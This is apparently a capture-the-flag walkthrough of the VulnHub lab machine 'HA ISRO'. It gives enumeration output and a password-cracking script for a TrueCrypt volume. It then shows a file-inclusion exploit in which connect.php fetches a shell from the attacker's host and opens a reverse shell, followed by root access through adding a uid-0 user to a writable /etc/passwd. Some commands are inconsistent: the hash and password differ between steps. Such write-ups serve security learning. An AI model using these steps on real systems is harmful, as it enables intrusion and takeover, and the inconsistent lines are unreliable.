HA ISRO (VULNHUB)

Link: https://drive.google.com/file/d/1QgmeUi0GmLESYUdojhE_x4TH9lyAiMuF/view

root@kali:~# nmap -A 192.168.222.151
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-23 15:41 GMT
Nmap scan report for 192.168.222.151
Host is up (0.00025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:d2:c5:ec:a5:f9:c4:f3:8a:70:f6:df:ac:ad:a9:24 (RSA)
| 256 34:ae:7a:6f:94:93:25:de:39:e3:14:b0:61:80:34:54 (ECDSA)
|_ 256 5e:52:99:70:f4:d1:c0:f6:6e:62:30:94:ee:47:be:59 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: ISRO – Govenment of India
MAC Address: 00:0C:29:7E:97:0D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.222.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.40 seconds

now on browser

http://192.168.222.151/

http://192.168.222.151/bhaskara.html

view-source:http://192.168.222.151/bhaskara.html

output :

now on terminal

root@kali:~# echo “L2JoYXNrYXJh” | base64 -d
/bhaskara

try to access this

http://192.168.222.151/bhaskara

save the file

root@kali:~# gedit true.py

#!/usr/bin/env python

# TrueCrypt volume importion to a format usable by John The Ripper
#
# Written by Alain Espinosa in 2012. No copyright
# is claimed, and the software is hereby placed in the public domain.
# In case this attempt to disclaim copyright and place the software in the
# public domain is deemed null and void, then the software is
# Copyright (c) 2012 Alain Espinosa and it is hereby released to the
# general public under the following terms:
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# There’s ABSOLUTELY NO WARRANTY, express or implied.
#
# (This is a heavily cut-down “BSD license”.)
#
# Ported to Python by Dhiru Kholia, in June of 2015

import sys
from os.path import basename
import binascii

def process_file(filename, keyfiles):

try:
f = open(filename, “rb”)
except Exception as e:
sys.stderr.write(“%s : No truecrypt volume found? %s\n” % str(e))
return

header = f.read(512) # encrypted header of the volume
if len(header) != 512:
f.close()
sys.stderr.write(“%s : Truecrypt volume file to short: Need at least 512 bytes\n”, filename)
return

for tag in [“truecrypt_RIPEMD_160”, “truecrypt_SHA_512”, “truecrypt_WHIRLPOOL”]:
sys.stdout.write(“%s:%s$” % (basename(filename), tag))
sys.stdout.write(binascii.hexlify(header))
if keyfiles:
nkeyfiles = len(keyfiles)
sys.stdout.write(“$%d” % (nkeyfiles))
for keyfile in keyfiles:
sys.stdout.write(“$%s” % keyfile)
sys.stdout.write(“:normal::::%s\n” % filename)

# try hidden volume if any
f.seek(65536, 0)
if f.tell() != 65536:
f.close()
return
header = f.read(512)
if len(header) != 512:
f.close()
return

for tag in [“truecrypt_RIPEMD_160”, “truecrypt_SHA_512”, “truecrypt_WHIRLPOOL”]:
sys.stdout.write(“%s:%s$” % (basename(filename), tag))
sys.stdout.write(binascii.hexlify(header))
if keyfiles:
nkeyfiles = len(keyfiles)
sys.stdout.write(“$%d” % (nkeyfiles))
for keyfile in keyfiles:
sys.stdout.write(“$%s” % keyfile)
sys.stdout.write(“:hidden::::%s\n” % filename)

f.close()

if __name__ == “__main__”:
if len(sys.argv) < 2:
sys.stderr.write(“Error: No truecrypt volume file specified.\n”)
sys.stderr.write(“\nUtility to import TrueCrypt volume to a format crackeable by John The Ripper\n”)
sys.stderr.write(“\nUsage: %s volume_filename [keyfiles(s)]> output_file\n” % sys.argv[0])
sys.exit(-1)

keyfiles = []
if len(sys.argv) > 2:
keyfiles = sys.argv[2:]

process_file(sys.argv[1], keyfiles)

save it

root@kali:~# python true.py bhaskara > hashes

root@kali:~# john hashes –show

output : xavier

now try to open bhaskara

with veracrypt

and put credential

we get the flag file

root@kali:~/Downloads# dirb http://192.168.222.151

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Wed Oct 23 15:52:07 2019
URL_BASE: http://192.168.222.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.222.151/ —-
==> DIRECTORY: http://192.168.222.151/img/
+ http://192.168.222.151/index.html (CODE:200|SIZE:5859)
+ http://192.168.222.151/server-status (CODE:403|SIZE:280)

—- Entering directory: http://192.168.222.151/img/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—————–
END_TIME: Wed Oct 23 15:52:10 2019
DOWNLOADED: 4612 – FOUND: 2

root@kali:~/Downloads# dirb http://192.168.222.151 -X .php

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Wed Oct 23 15:52:50 2019
URL_BASE: http://192.168.222.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.222.151/ —-
+ http://192.168.222.151/connect.php (CODE:200|SIZE:0)

—————–
END_TIME: Wed Oct 23 15:52:53 2019
DOWNLOADED: 4612 – FOUND: 1

now try to access

http://192.168.222.151/img/

http://192.168.222.151/img/aryabhata.jpg

root@kali:~/Downloads# wget http://192.168.222.151/img/aryabhata.jpg
–2019-10-23 15:54:11– http://192.168.222.151/img/aryabhata.jpg
Connecting to 192.168.222.151:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 212762 (208K) [image/jpeg]
Saving to: ‘aryabhata.jpg’

aryabhata.jpg 100%[===================================================================>] 207.78K –.-KB/s in 0.001s

2019-10-23 15:54:11 (223 MB/s) – ‘aryabhata.jpg’ saved [212762/212762]

root@kali:~/Downloads# steghide extract -sf aryabhata.jpg
Enter passphrase:
wrote extracted data to “flag.txt”.

root@kali:~/Downloads# cat flag.txt
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation :

http://192.168.222.151/connect.php?file=/etc/passwd

output :

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin isro:x:1000:1000:isro,,,:/home/isro:/bin/bash sshd:x:106:65534::/run/sshd:/usr/sbin/nologin ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false

root@kali:~# gedit shell.php

save it

root@kali:~/Downloads# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

now on browser

192.168.222.151/connect.php?file=http://192.168.222.132/shell.php

now on terminal

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.222.151.
Ncat: Connection from 192.168.222.151:58404.
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
09:01:59 up 21 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$

$ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@ubuntu:/$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 222 192.168.222.151:58404 192.168.222.132:1234 ESTABLISHED 851/sh
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –
tcp6 0 0 :::65534 :::* LISTEN –
tcp6 0 0 192.168.222.151:80 192.168.222.132:52324 ESTABLISHED –
www-data@ubuntu:/$

www-data@ubuntu:/$ mysql -u root
mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.7.27-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> show databases;
show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| flag |
| mysql |
| performance_schema |
| sys |
+——————–+
5 rows in set (0.00 sec)

mysql> use flag;
use flag;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+—————-+
| Tables_in_flag |
+—————-+
| flag |
+—————-+
1 row in set (0.00 sec)

mysql> select * from flag;
select * from flag;
+—————————————————-+
| flag |
+—————————————————-+
| Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435} |
+—————————————————-+
1 row in set (0.00 sec)

mysql>

Privilege Escalation :

www-data@ubuntu:/$ ls -la /etc/passwd
ls -la /etc/passwd
-rwxrwxrwx 1 root root 1455 Oct 3 00:27 /etc/passwd

on another terminal

root@kali:~/Downloads# openssl passwd -1 -salt user3 pass123
$1$user3$rAGRVf5p2jYTqtqOW5cPu/

www-data@ubuntu:/$ echo ‘raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash’ >>/etc/passwd >/etc/passwd

www-data@ubuntu:/$ tail /etc/passwd
tail /etc/passwd
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false
raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash
www-data@ubuntu:/$ su raj
www-data@ubuntu:/$ su raj

Password: Pass123

root@ubuntu:~# cd /root

root@ubuntu:~# ls

root@ubuntu:~# cat final.txt

@SAKSHAM DIXIT